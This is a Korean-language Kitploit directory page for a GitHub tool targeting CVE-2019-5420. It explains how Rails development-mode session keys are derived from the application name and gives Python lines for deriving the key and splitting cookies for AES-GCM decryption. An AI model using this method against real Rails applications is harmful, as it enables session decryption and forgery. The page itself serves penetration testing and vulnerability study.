Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2019-5420 — 취약점으로 인해 공격자가 자동 생성된 개발 모드 비밀 토큰을 추측할 수 있습니다. | Kitploit
도구/GitHubGitHub/j4k0m/cve-2019-5420
Encryption/Decryption ToolsPassword AttacksVulnerability AnalysisWeb Application ExploitationPenetration Testing
GitHubj4k0m/cve-2019-5420

CVE-2019-5420

취약점으로 인해 공격자가 자동 생성된 개발 모드 비밀 토큰을 추측할 수 있습니다.

저장소 보기
5125년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2019-5420

취약점으로 인해 공격자가 자동으로 생성된 개발 모드 비밀 토큰을 추측할 수 있습니다.

Ruby-on-Rails가 개발 모드에서 실행 중일 때 발생합니다. 개발 모드에서는 공격자가 세션을 보호하는 데 사용되는 키를 추측할 수 있습니다.

복호화:

키 생성:

Rails는 3가지 환경(development, test, production)을 사용하며, 애플리케이션이 개발 모드를 사용할 때 비밀 토큰을 추측하고 암호화된 세션을 복호화할 수 있습니다.

세션 보호에 사용되는 키는 애플리케이션 이름에서 파생됩니다.

예시:

root@kitploit:~
rails new Jakom

Jakom: 애플리케이션 이름.

이를 통해 키가 생성 메서드의 출력임을 추측할 수 있습니다:

root@kitploit:~
PKDF2_HMAC_SHA1[ MD5 [ APPNAME + "::Application" ] , salt: "authenticated encrypted cookie" , iterations: 1000 , key's length: 32 ]

여기에 표시된 대로:

root@kitploit:~
key = pbkdf2_hmac("sha1", md5_name.encode("utf-8"), "authenticated encrypted cookie".encode("utf-8"), 1000, 32)

키로 세션 복호화:

Rails에서 세션은 AES-256-GCM으로 암호화되며, 키가 있으면 세션을 복호화/암호화할 수 있습니다.

마지막으로 필요한 것은 세션 형식입니다:

root@kitploit:~
BASE64 [ DATA ] -- BASE64 [ IV ] -- BASE64 [ AUTH_TAG ]

복호화 예시:

여기에 표시된 대로:

root@kitploit:~
data = binascii.hexlify(base64.b64decode(base64_data.split("--")[0])).decode("utf-8")
iv = binascii.hexlify(base64.b64decode(base64_data.split("--")[1])).decode("utf-8")
tag = binascii.hexlify(base64.b64decode(base64_data.split("--")[2])).decode("utf-8")

세션 쿠키의 첫 번째 부분은 암호화된 데이터, 두 번째 부분은 IV, 세 번째 부분은 GCM 태그(인증 태그)입니다. 이 정보를 사용하여 세션을 직접 복호화할 수 있습니다: image

예시:

image

도구 다운로드